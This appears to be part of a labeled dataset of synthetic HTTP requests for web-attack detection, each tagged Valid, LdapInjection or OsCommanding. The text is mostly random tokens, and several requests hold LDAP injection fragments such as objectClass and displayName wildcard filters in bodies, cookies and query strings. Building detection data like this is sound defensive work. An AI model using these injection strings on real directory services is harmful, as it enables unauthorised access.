Cookie: ipeacou=hdsu0;eBgrxt4Wfht=cmame9utc6ri
Cookie2: $Version="5"
Date: Wed, 07 Dec 05 06:52:54 UTC
ETag: W/"GttmMiKOf9YUXGvGQFS"
Expect: 100-continue
From: iiteLaco@s0ovono0.de
If-Modified-Since: Wed, 05 Jan 05 22:05:30 CET
If-Unmodified-Since: Fri, 01 Jan 10 23:35:13 UTC
If-Match: "d0g_Y_0u9@w87QdSs"
If-None-Match: *
If-Range: *
Max-Forwards: 2172
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic anIxZW1zOnRsNVZ0b0k=
Authorization: Basic YWFpaHlkb246dGhldGRsdA==
Range: 52945-
Referer: http://vnh5ozc.net/ieuO.cfm
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 0.8; af-7E; rv:2.4.4) Gecko/33642349
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: HTTP/8.4 2.140.71.122:4712, 8.5 192.33.172.98
Transfer-Encoding: H2ij; r30Es=scg3T
Upgrade: paa/5.3, a9Au/8.0
Warning: 837 www.amWce.png "H1oteohur" 
X-Forwarded-For: 188.221.207.247
X-Serial-Number: 59070320444976577945
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21205
Start - Id: 36908
class: LdapInjection
PUT /all9LeGEET@3djmocha3/auqeRV.OQeqBJqIc/eseh/lGuDvQvr7tHjmvqU/yZ13UJPxYfP/taah7iiqbAo6fD5nc2q/ef/97sntAYhAtohsoe/iiM/r5fm4G.nsf? HTTP/1.0
Content-Length: 164
Content-Language: oIh,nwre,aon
Content-Encoding: compress
Content-Location: /atlx.exe
Content-MD5: ZW50c3JCMGx5YlFobzF1NA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 May 08 05:29:26 CET
Last-Modified: Fri, 25 May 07 06:00:44 UTC
Host: 222.55.15.53:8636
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, gzip;q=0.9, compress;q=0.8
Accept-Language: *
Cache-Control: uoadfol=osAE7n
Client-ip: 52.204.101.18
Cookie: S2kR=snlS;n6toonuheA=q6qdVrbp;giaafaseoa=xscriptSr;elWIasoritc0f=whREnnD0dwseeepassthruh+k;etlyt=549297010
Cookie2: $Version="8"
Date: Sun, 19 Oct 08 08:40:49 CET
ETag: "JjZImyztplyA4.bN-Dt"
Expect: 5nir
From: Do6baraA@811ntp.st
If-Modified-Since: Wed, 26 Aug 09 09:46:37 GMT
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: *
If-None-Match: "9BPvDR-2jxecJdF-mrzu"
If-Range: *
Max-Forwards: 31
MIME-Version: 7.4
Pragma: asM=tooe
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: /ii2t/iokh/ewumr/raawe.tiff
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (X11; U; Open BSD i386 0.1; cf-ze; rv:9.5.1) Gecko/54974932
UA-OS: Win98
UA-Pixels: 015x0585
Via: FTP/5.0 150.86.71.149, 1.2 109.188.177.25
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihbsilcsnt5Ahr=or5Qdk.ANK&fzijTeee7sterab=251234&cyQlunLa=0454170&taegxatdeBe=9BJzOPf&a4oltunihrrt=replace]hsi&qonentomn=ahie)(&(objectClass  = 1ott*)

End - Id: 36908
Start - Id: 37494
class: LdapInjection
GET /p3nVge.LLPrp/eNkrL8/9Vvxp_/n0d6yXb/ijF.7qFlNHVaxpETQ/HY/sj6/8snstrttireaeb.cgi? HTTP/1.0
Host: www.owioe5sa.biz:4081
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, hz-gb-2312;q=0.3, x-mac-chinesetrad, iso-8859-15, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: tsR1oare-ti1ot, gf-Fo3onh, w8peus6a-eewkooh, eQ-COa9obrB, yoge7-lO;q=0.2
Client-ip: 118.8.27.231
Cookie: Sswu=6463)(&(objectClass=rd3m)(|(sn=zzEY)(cn=s  J*))
Date: Sun, 02 Aug 09 07:14:17 CET
ETag: W/"nkHBMAGp40C9SBrz2"
Expect: eoa3ev=ihHt
If-Modified-Since: Mon, 23 Aug 04 12:16:09 GMT
If-Unmodified-Since: Thu, 25 Jan 07 20:30:38 UTC
If-None-Match: "_qH@sHks0BoWCdhf23"
If-Range: Wed, 08 Aug 07 18:19:03 UTC
Max-Forwards: 673
MIME-Version: 7.0
Proxy-Authorization: tastT te7gttj=ethsB
Authorization: Basic YW5zYXRhYTpodWFzaWVv
Range: -073
Referer: /eoafae/loenTN9/neliieW.txt
TE: deflate;q=0.5
User-Agent: d_V8ZUZA http://www.sxSr42n.gov
UA-OS: Windows NT
Via: 9.3 129.197.184.142, 2.6 204.6.31.142, Deni/5.8 228.77.68.149
Transfer-Encoding: ehie; udnstnu=laeai
Warning: 813 www.aje1eeE.tiff:9 "Avrer" 
X-Serial-Number: 5649136594252322056
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37494
Start - Id: 18161
class: Valid
GET /tNetxX/wdihtajewmocje/tD.aspx? HTTP/1.1
Host: www.eesMtn88o.gov
Connection: close
Accept: application/x-tar;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate;q=0.6
Accept-Language: enrtsupO-jhariad6, fte-ywlEietZ, esidagda-eho, rewt-wu;q=0.6
Cache-Control: no-store
Client-ip: 187.103.207.94
Cookie: pm7atasaleg2=37
Cookie2: $Version="841"
Date: Sun, 30 Jan 05 24:58:54 UTC
ETag: W/"UI_Ukclehxlk_80C"
Expect: 100-continue
From: 96bse@Sia8e.it
If-Modified-Since: Thu, 04 Oct 07 07:14:17 CET
If-Unmodified-Since: Tue, 27 Mar 07 13:26:03 CET
If-Match: "mqTqHbWK1HqNWjOhpa"
If-None-Match: "Kb4VrEktA5D2bJK"
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 9373
MIME-Version: 0.4
Pragma: ib8m=7eietww
Proxy-Authorization: Basic ZXJhaTJodGU6a3RTaQ==
Authorization: Digest nonce
Range: 875436-348852,-818
Referer: /vsxdxETk/uiuh/fcr8faia/c2ugpze/f6bb.php
TE: deflate,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 8.1; ab-en; rv:4.1.4) Gecko/35985572
UA-CPU: MIPS
UA-Disp: 2033,9785,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: aoeten/1.4 www.eqzf.jpeg, rtnm/5.4 www.l3oE.jpg, 7.1 www.ki0oidyy.gif
Transfer-Encoding: egeNt
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 963 216.51.91.254:266 "gatunof" "Thu, 18 May 06 14:03:37 CET"
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18161
Start - Id: 2590
class: Valid
GET /m-/opv6sidetmric.shtml?riro1itek58=88801524&lGNvQPU4.bodyA=tsula&swe5s=Mejuuw-&auuiasic=rt&jmp=b&ede6Ap=eCOS&ejeiEe9rzkG=etc%22execcpositionws+%3A%22%25ujytadminr+&rtaisnastw=hmCe&wuraxmlxZ6=an%40ee+%3Bo+B&aimg_anduYrDM=5692&OYCY2v=359 HTTP/1.0
Host: www.scms.com
Connection: close
Accept: video/*;q=0.7
Accept-Charset: x-mac-icelandic, euc-cn, windows-874
Accept-Encoding: 
Accept-Language: dsa-9dfi2aee, mxs-ld3d;q=0.4, p2-titbb86A
Cache-Control: no-store
Client-ip: 55.106.123.246
Cookie: yaeig7h3sfTe=zSyo;a8=nTXDko
Cookie2: $Version="56"
Date: Thu, 13 Nov 08 08:33:17 CET
ETag: W/"VIXU5KySQEy1khxcK0P"
Expect: nOEsgerb=n7r6aitg
From: nenonte@ily8ueedor.uk
If-Modified-Since: Sun, 17 Aug 08 08:49:59 CET
If-Unmodified-Since: Tue, 15 Jun 04 05:09:25 UTC
If-Match: *
If-None-Match: "bwNlKyxiCZVkRN8Rwj4"
If-Range: *
Max-Forwards: 359
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM c2dzeVRldW5ONFdlZW1peXZlbnNzbGJ1c3V2bTJvTXg=
Authorization: Digest nc=1A6CB05c
Range: 9-6,46-1
Referer: /mttsssi/jpmest/7onhin/jsfps/ggtsesso.mdb
TE: gzip;q=0.3
Trailer: Referer
User-Agent: Desontsie (5z8kM.4q3; tcHI3XPCX; md4eEEuhA; 07D.v_Z8jH; reOhZ-R1)
UA-CPU: PowerPC
UA-Disp: 9744,1465,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 670x694
Via: 6.2 143.198.222.251
Transfer-Encoding: svie
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2590
Start - Id: 27168
class: Valid
GET /jnuyeipo/a8BhGq2/2fXyJkXvhjGt3YwGHvC/GLQ/ollibDgMiframe/teddkE22onp/dKYzXK/ZYL/6-KjcHeG.png?yh7za=lcourht9Ass1&epeyrAAtoHS=hhaeKigroup+byosrmshoraeOe9a&lNynNntr7Hl9bp=mleaifu8rujdedt HTTP/1.1
Host: 196.95.117.217
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=97
Client-ip: 81.132.85.194
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="2"
Date: Mon, 23 Mar 09 03:56:55 GMT
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: 100-continue
From: idrt4oi@clbes.fr
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Thu, 06 Sep 07 07:58:30 GMT
If-Match: "2Tv0BqVXvd0aAQpaB"
If-None-Match: "SrsI_q7mzmLvL@kmv"
If-Range: Fri, 02 Apr 10 07:47:03 UTC
Max-Forwards: 366
MIME-Version: 3.3
Pragma: e=t7j
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM ZTFlZ3Jhb3l5cG9pR25JdDlhU3VlZHROaXJobHI5cnVoZmFlaEVnb256dW5u
Range: 026-10,-71,7-952
Referer: http://www.h36onD.be/4iqtDOr/Rvsv5xt/tuey/eete5e/g8eoou5.fgf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 4.3; of-ug; rv:8.1.3) Gecko/94019629
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1267x0247
Via: 3.7 www.QentThs.css:78, Nsee/5.4 191.104.58.144, HTTP/4.9 190.23.192.178
Transfer-Encoding: identity
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27168
Start - Id: 27187
class: Valid
GET /Oetsh7e3nbrlKenenio/jc92v_TYbk.7t9l0DoT/6EQUL7Biframe9o/idi/qdmueqcfrxllposhhS/tsAedVItk.asp? HTTP/1.0
Host: 77.252.151.138
Connection: iptDed
Accept: image/*
Accept-Charset: euc-tw, iso-8859-8;q=0.4
Accept-Encoding: identity;q=0.8
Accept-Language: *;q=0.9
Cache-Control: max-age=3963
Client-ip: 112.140.12.92
Cookie: tyg1rttil=2107020
Cookie2: $Version="3"
Date: Fri, 19 Feb 10 24:04:26 UTC
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: 100-continue
From: tnEr3ec@tnrtge.com
If-Modified-Since: Fri, 19 Sep 08 15:16:55 CET
If-Unmodified-Since: Thu, 20 Oct 05 23:45:03 CET
If-Match: "R5aK9-3v17o.tpHI"
If-None-Match: "GXq@xFoH5BJ6yq7"
If-Range: "t9u8G3Ayxtw0o59U2Y"
Max-Forwards: 1
MIME-Version: 2.5
Pragma: ner=sh97kt
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest nc=ddCFAaD2
Range: -89,0751-3,3143-291
Referer: http://iapo.cz/6ndn/5iakaau.swf
TE: trailers,deflate;q=0.9
Trailer: Connection
User-Agent: Mozilla/5.6 (X11; U; SunOS sun4u 7.4; Es-he; rv:5.9.0) Gecko/17628203
UA-CPU: MIPS
UA-Disp: 451,9242,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3319x950
Via: ayanw/9.9 152.15.233.219, 6.3 246.235.192.51, 8.0 86.75.139.38:48
Transfer-Encoding: identity
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27187
Start - Id: 23081
class: Valid
GET /yunuoeUNuM/unionQ1@_7zmq/PohtofsaanOmiodhwle/aslmieesbrs9onwrne/aHLu5As3/oUwmL_F/ieIfKzSPiJhDn/c6/jPbjEH.jpeg?3D7X=srs+x%40asasins8artl&jtltrie=m1lcsod&sietcseih=8348&ktDaof=dS0&idY17=t%287xnopengw4wrsystemnn&oi=aOwX_OmMgSh&sooth4HatlrpteZ=odtbsoaw&enio1qodnsIp=3118&redsletkiwguKr=djh HTTP/1.1
Host: www.8xsezohbbn.fr
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 109.191.160.78
Cookie: otld2Ihs=:sandy;SWAD=e2oesfier7ma3aly;4dHidie7nfctdr=cgcjMV1@;Woo0ya=r]co;tc062aseit3b1= tef+utsorna=ano;kousissDlnlt=e )84tIechol+aohee:z
Cookie2: $Version="97"
Date: Sun, 25 Oct 09 08:22:43 UTC
ETag: W/"6jU3qjmRU9Gu.70"
Expect: 100-continue
From: taxc@cvbh.de
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Tue, 04 Nov 08 22:20:56 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Mar 06 01:53:07 UTC
Max-Forwards: 9846
MIME-Version: 2.8
Pragma: ht0='D'
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: Digest algorithm=ituf8uNo
Range: 411788-,-919885,19-6
Referer: /hoqna/ahite/izpsO/oekn/oeev9.mp3
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 1.4; ec-sr; rv:6.0.4) Gecko/89160373
UA-CPU: MIPS
UA-Disp: 784,1462,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8704x5020
Via: 0.9 www.sueuiun.js
Transfer-Encoding: identity
Upgrade: prlHv/9.3, doutme/0.7, 0ng/5.1, sapxte/1.0, gee/6.5
Warning: 928 79.197.115.34 "thIpvU9anr5wv2of" 
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23081
Start - Id: 7050
class: Valid
PUT /nedM79nrtioargfu/GsystemEWU/tR@b6s8/e1-YftF5kbandt.8z/rHQV6qnUhICBPW96SB/fGIefz.kpy2DeCxxf@/lLZQaVJlTfQ@/ge/s_.htm? HTTP/1.1
Content-Length: 206
Content-Language: hNetlVy7,stesookj
Content-Encoding: deflate
Content-Location: /temero.avi
Content-MD5: VXJtdG5zbmNydGFlckI4bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jun 07 15:46:29 UTC
Last-Modified: Mon, 23 Feb 04 04:22:22 UTC
Host: www.lumNroex.net
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.8
Accept-Language: noo-aieesl
Cache-Control: no-store
Client-ip: 98.167.221.144
Cookie: ttwlpL7rtnxsoh=maadH;ohoyeil=rid4ymo
Cookie2: $Version="137"
Date: Mon, 13 Mar 06 20:56:09 GMT
ETag: "CCYMNETtXIRX-Ju7FoJ"
Expect: Ie0qh=eheg;feba=frrLit
From: 0eime@LbeI4fNnf.net
If-Modified-Since: Mon, 04 Feb 08 20:11:50 GMT
If-Unmodified-Since: Fri, 26 Sep 08 08:29:27 GMT
If-Match: *
If-None-Match: "FNf72OOAa6PVwbwRW"
If-Range: Wed, 16 Nov 05 21:36:55 GMT
Max-Forwards: 339
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: av6on gevp5=fEhrwh
Authorization: NTLM Y3NuYXk3T25tcG9uMW9ucmVkbm5Tb210bnRha25zYmFuZWh0b2pwcmpleHl3bWk=
Range: -8,-8,0-
Referer: http://SWca.org/thni/88iao/avqd/etasy.pdf
TE: chunked;q=0.5,deflate;q=0.8
Trailer: Accept-Charset
User-Agent: xTan4n/9.0.7.1.6
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: 0.9 www.rPem.html:212
Transfer-Encoding: deflate
Upgrade: I2ti/2.8, auou/8.8, qzqset/3.8
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

98oslnh=h'@home mo]q%sx+Ehxae&cVXbetween=702861&g5iredrk=ooteri2StRenj&nafhe8euEnnani=axw&td_ljeU0h=eno1hvww&eiu=w rob[+:fi evnhaopen&tni3apcn= u&jLQwZVQdIY=51548140&utadmoyqttapesS=a3n)ei

End - Id: 7050
Start - Id: 15088
class: Valid
GET /Birsiicrs/srTt/5cZMbez_PaXwuzWHbw7c/FTMgMQcmdtnodeYstdin97/ifop4wUsaa/@qI/imko/2tgetnft.htm?3LeAhlC=72 HTTP/1.1
Host: 202.147.48.89
Connection: keep-alive
Accept: text/html;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 49.165.252.55
Cookie: Jgroup byLsexecHuMxoIO=155;ad=c;maySk=d5iunion3Ho9uyt
Cookie2: $Version="87"
Date: Tue, 06 Jan 09 06:24:41 CET
ETag: W/"a8niLs2b.cMhqLt8yD"
Expect: 100-continue
From: roosu@y2ntzablc.st
If-Modified-Since: Fri, 18 May 07 13:03:23 UTC
If-Unmodified-Since: Tue, 19 Dec 06 07:38:54 GMT
If-Match: "Fe0EquxK_ZVtkDWDLGA"
If-None-Match: "ht4BVUtV5jn63-CQQ"
If-Range: *
Max-Forwards: 83
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=tntha5x
Authorization: udTdin n90u3g=Lo3d
Range: -3610,072048-063,-8
Referer: http://toaEgdi.st/triY/tSnaer3/spAi9ei/au4tch.fgf
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: TnriDn/1.0
UA-CPU: 68000
UA-Disp: 5004,5177,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0882x4753
Via: HTTP/9.5 www.eyKieo0u.jpeg
Transfer-Encoding: deflate
Upgrade: algm1/8.1, edtl/2.9, xxsltl/3.5, gslil/9.8, aVl/6.4
Warning: 116 www.eseDe.htm "27q3Eouttsesl7rsU" 
X-Forwarded-For: 85.3.154.75
X-Serial-Number: 63629752073074
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15088
Start - Id: 38556
class: LdapInjection
GET /-k0Yselect80aBZI/vj-VbycKG3.aspx?hocoeso3aIr=%29++++%28+%7C++++%28displayName%3Dhad*%29+++%28name++++%3D++++had*++++%29%28mail%3Dhad*%29&lnaIdq=es&ac9Edh=wiaiyivnmto3tj&boot.iniACY=%40nmllayt&5tih=tonnarconnectR%24%5Cc&siou=hvWPJ&dsor9wieAdae=945204 HTTP/1.1
Host: www.j3Siy.cz:348
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-9, x-mac-hebrew;q=0.7
Accept-Encoding: *
Accept-Language: Exaldn-E, dv-dIp
Cache-Control: min-fresh=710
Client-ip: 40.99.33.206
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="7"
Date: Wed, 09 Nov 05 24:40:48 CET
ETag: W/"@tyb3ncQYBWwihXP"
Expect: elny
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Tue, 08 Apr 08 15:10:53 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 828
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: -956,35-
Referer: http://jdoi.cz/grOs6skh.tiff
TE: gzip
Trailer: Transfer-Encoding
User-Agent: tKx@gC http://www.ktntfatu.net
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/4.2 117.2.41.195, 2.2 74.104.235.99, FTP/3.0 221.114.205.240
Transfer-Encoding: uds5Fy; yiecat2=LavaT7a
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38556
Start - Id: 25334
class: Valid
GET /fin0NczTJkm/necihciaaieToi1nCew/eo1w@RutVex/noZ/aecni/sGDf/8a/AGZ/lhaaziemo7nolcEf.php?na4rrf6okrte=034&thuhurn4=rc&rjJjN=09&rerDr=+&tlaELmia=Coh3hn7qyssaronne HTTP/1.1
Host: www.nigintd9rd.biz
Connection: e3umomra
Accept: image/*, audio/*, image/png;q=0.7
Accept-Charset: gb2312;q=0.7, windows-1257, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: s-rgh3f;q=0.0, tseolpq0-ylstu5, fitsh-hr;q=0.6, fnib-apyt0
Cache-Control: no-cache
Client-ip: 248.193.88.112
Cookie: adyrstt0eGe=rZ.yyi;t6bm1xTMtrlt=4397;ndu5=a;aT=ROr;HGybi=e6noperl;iaoEahhed62no=AEakelzeoAitbeoAbs
Cookie2: $Version="166"
Date: Thu, 27 Jan 05 21:26:35 CET
ETag: "k0yDpisrt@FrTBjdjEE"
Expect: 100-continue
From: hrnme@5lttxYa7.ch
If-Modified-Since: Sun, 06 Feb 05 13:22:06 UTC
If-Unmodified-Since: Wed, 29 Apr 09 04:54:07 UTC
If-Match: "pirJeWoRoNmNwkSURaPW"
If-None-Match: *
If-Range: Fri, 25 Sep 09 10:31:47 CET
Max-Forwards: 9
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.rn0rrh.it/uox5plt/dRe5wf1t/sEfn/doaoli7/aepASr.cfm
Authorization: NTLM Y1lFbGFuZWkxdGVzaE5zZWZzMW56aXJvYWxyMmdpaEg=
Range: -5,9601-,-779
Referer: /9yeu/usdtrrz/cein/Ve5m/rrvy9e.php4
TE: gzip,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.6 (X11; U; Linux i386 5.3; Ie-nh; rv:2.8.1) Gecko/48635934
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3370x895
Via: FTP/0.5 166.168.112.181:65996, 7.6 230.218.104.175, FTP/8.8 www.btoesz.gif
Transfer-Encoding: aoe4; rdalfRue=lsnhe
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 741551473242007
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25334
Start - Id: 27612
class: Valid
GET /tqrO/ehivol2huoeoDenohoei.js?laRIoust9teikpP=i%29S&tw=sss8syshdnE4eit HTTP/1.0
Host: www.eeehHyw.biz
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, gzip;q=0.9, identity
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 70.6.137.206
Cookie: 5Hade=nIupdateg)[ste'w)<]ii7;meka=z/e=gsnodeoiayja4xei@) 
Cookie2: $Version="1"
Date: Mon, 28 Sep 09 14:37:21 CET
ETag: "O5pwZFKgQL1aoTqJ"
Expect: 100-continue
From: 06wy8l@mtedC.de
If-Modified-Since: Wed, 16 Apr 08 04:03:43 GMT
If-Unmodified-Since: Mon, 06 Jun 05 06:34:58 UTC
If-Match: "sskGDEsTKTMV-_leKUC"
If-None-Match: *
If-Range: Sat, 27 Aug 05 20:32:19 CET
Max-Forwards: 55
MIME-Version: 9.4
Pragma: nEoGet='lem'
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Basic N2xsdW45aTpkaHNyNw==
Range: -004669,-26019
Referer: http://www.ecvrd.biz/X0dr/obmneni.txt
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.6 (X11; U; Linux i586 8.9; aq-ly; rv:7.2.4) Gecko/25663613
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: 0.1 178.59.127.94
Transfer-Encoding: deflate
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27612
Start - Id: 25079
class: Valid
GET /ub74/t2veto22Oyt.php3?E4husotamguqem=qhttp0a&oi8rsbdby=614429412&cexecYvnulln=l&MtubjcryI2fd=64298&ip5samNgtautoexec=5037099&httpxJVG=goih&td3iI=s&32Ia3htpassimetaR=iimMx3.&mdtehlNXasa=-eT&Gtizddfsoem=stib&pNdseptEer=%27dsreplacegrufmr HTTP/1.0
Host: www.leE1.cz
Connection: tjahitp
Accept: text/plain, text/*;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rlen-dler;q=0.6, a-b9iq
Cache-Control: no-cache
Client-ip: 21.199.130.58
Cookie: iDetgcsDfawht=ttdcnceN;iivln=30e2weu8hlc;a9cp=m8t;eenjhiltrttHErc=15186
Cookie2: $Version="222"
Date: Fri, 16 Jun 06 04:43:41 UTC
ETag: "If@G4rojk@vGsF@9qb"
Expect: ealone=e4sD
From: lmqed@thztsEu.it
If-Modified-Since: Fri, 20 May 05 19:30:21 CET
If-Unmodified-Since: Sun, 17 Apr 05 20:14:53 GMT
If-Match: *
If-None-Match: "AtKBqJJAhdz4snX7-Dw"
If-Range: "oZYm4ncho23dPZpZ"
Max-Forwards: 330
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: NTLM Y29zYnRreGVuam9lcnQ0bGVhRXRldGo2eG9wdGV0ZmVyOXdo
Range: -76678,-91938
Referer: http://rotaw.st/hiwe.mpeg
TE: gzip,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (X11; U; Linux i386 8.4; eh-ck; rv:5.6.0) Gecko/96577545
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6866x078
Via: 1.9 0.154.70.81:1433
Transfer-Encoding: compress
Upgrade: oxLt/4.8, eoiRg/1.3, tetp3B/2.6
Warning: 069 254.171.0.195 "tteepahhCi0" 
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25079
Start - Id: 36385
class: OsCommanding
